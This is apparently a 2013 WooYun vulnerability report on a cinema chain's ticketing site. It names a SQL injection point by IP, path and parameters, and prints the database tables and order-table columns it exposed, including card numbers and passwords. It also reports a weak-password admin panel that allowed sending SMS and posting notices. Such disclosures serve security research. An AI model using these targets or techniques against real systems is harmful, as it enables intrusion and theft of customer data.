当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038268

漏洞标题:耀莱成龙影城sql注入及弱口令

相关厂商:耀莱国际影城

漏洞作者: yhoojj

提交时间:2013-09-26 17:52

修复时间:2013-11-10 17:53

公开时间:2013-11-10 17:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

耀莱成龙影城sql注入及弱口令;不知道能不能看电影

详细说明:

注入点

http://118.145.26.210/feature/showTimeByCineam.aspx?placeNO=11064201&Date=2013-09-28

pacleNo和date注入 

current user:    'YLJACK'
current schema (equivalent to database on Oracle):    'YLJACK'
Database: YLJACK
[49 tables]
+-------------------------+
| T0001_AD_USER           |
| T0002_AD_ROLE           |
| T0003_AD_COMPETENCE     |
| T0004_AD_USERROLE       |
| T0005_AD_COMPROLE       |
| T0006_USERCINEMAL       |
| T0100_PLACEINFO         |
| T0101_PLACEMSG          |
| T0103_PLACEHALLINFO     |
| T0104_SEAT              |
| T0108_PIECE             |
| T0109_SEATPIECE         |
| T0201_FEATURE_APP       |
| T0300_ORDERFORM         |
| T0303_ORDERFORM         |
| T0400_FILMMESSAGE       |
| T0401_FILMRELATION      |
| T0402_GENREMESSAGE      |
| T0403_FIMEWARN          |
| T0406_FILMTICKET        |
| T0500_ALLTYPEIMAGE      |
| T0600_CARDRECHARGE      |
| T0601_USER              |
| T0602_COMPETENCE        |
| T0603_MEMBER            |
| T0603_MONEY2PONIT       |
| T0604_USERMEMBER        |
| T0605_BUSUSER           |
| T0606_EXCHANGE          |
| T0606_EXCHANGEACTIVE    |
| T0607_APP               |
| T0609_BUSAPPACTIVE      |
| T0609_RULE              |
| T0700_NEWS              |
| T0701_DISCUSS           |
| T0702_USERFILMPOINT     |
| T0801_QUEUING           |
| T0901_ADVERTISING       |
| T0904_CITY              |
| T0906_GKCITY            |
| T0908_COOPERINFO        |
| T0909_SENDMESSAGE       |
| T0910_LOG               |
| T0999_BASE              |
| T0999_SITEANALYSIS      |
| T0999_SITEANALYSIS_BACK |
| T0999_SITEVISITLOG      |
| T0999_SITEVISITLOG_BACK |
| T0999_TYPEDICTIONARY    |
+-------------------------+


<code>Database: QUICK_DATA
Table: T0300_ORDERFORM
[42 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| APPCODE | VARCHAR2 |
| BALANCEPRIC | NUMBER |
| CARDNUM | VARCHAR2 |
| CARDPLACENO | VARCHAR2 |
| CARDPWD | VARCHAR2 |
| FEATUREAPPNO | NUMBER |
| FEATUREDATE | VARCHAR2 |
| FEATURENO | VARCHAR2 |
| FEATURETIME | VARCHAR2 |
| FID | NUMBER |
| FOODMSG | VARCHAR2 |
| MEMO | VARCHAR2 |
| OPERUSERID | VARCHAR2 |
| OPERUSERNAME | VARCHAR2 |
| OPERUSERSID | VARCHAR2 |
| OPERUSERTYPE | VARCHAR2 |
| ORDERCHARGETYPE | NUMBER |
| ORDERDATE | VARCHAR2 |
| ORDERNO | NUMBER |
| ORDERTIME | VARCHAR2 |
| PAYORDER | VARCHAR2 |
| PAYPRICE | NUMBER |
| PAYREFUND | VARCHAR2 |
| PAYSERIAL | VARCHAR2 |
| PLACENO | VARCHAR2 |
| PRODATETIME | DATE |
| PROFLAG | VARCHAR2 |
| RECVMOBILENO | VARCHAR2 |
| REPFID | NUMBER |
| SEATINFO | VARCHAR2 |
| SEATPIECENAME | VARCHAR2 |
| SENDRESULT | VARCHAR2 |
| SENDTYPE | VARCHAR2 |
| STANDPRIC | NUMBER |
| SUCCSIGN | VARCHAR2 |
| TICKETSNUM | NUMBER |
| TICKETSPRICE | NUMBER |
| TICPRICE | NUMBER |
| TICTYPE | VARCHAR2 |
| USEFULLIFE | VARCHAR2 |
| USER_ID | NUMBER |
| VALIDCODE | VARCHAR2 |
+-----------------+----------+
网站支持在线选票及支付……
未继续

漏洞证明:

后台弱口令

http://118.145.26.216/?m=user&a=default


看他说话吧
自定义短信到任意手机

2.jpg


报表

4.jpg


发布公告~

3.jpg


未继续未实施

修复方案:

null

版权声明:转载请注明来源 yhoojj@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝